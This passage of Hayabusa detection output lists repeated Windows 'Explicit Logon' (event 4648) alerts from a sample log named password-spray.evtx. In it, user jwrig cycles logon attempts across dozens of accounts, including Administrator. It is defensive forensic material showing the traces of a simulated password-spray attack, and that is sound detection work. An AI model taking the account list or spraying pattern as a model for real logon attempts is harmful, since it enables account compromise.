Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
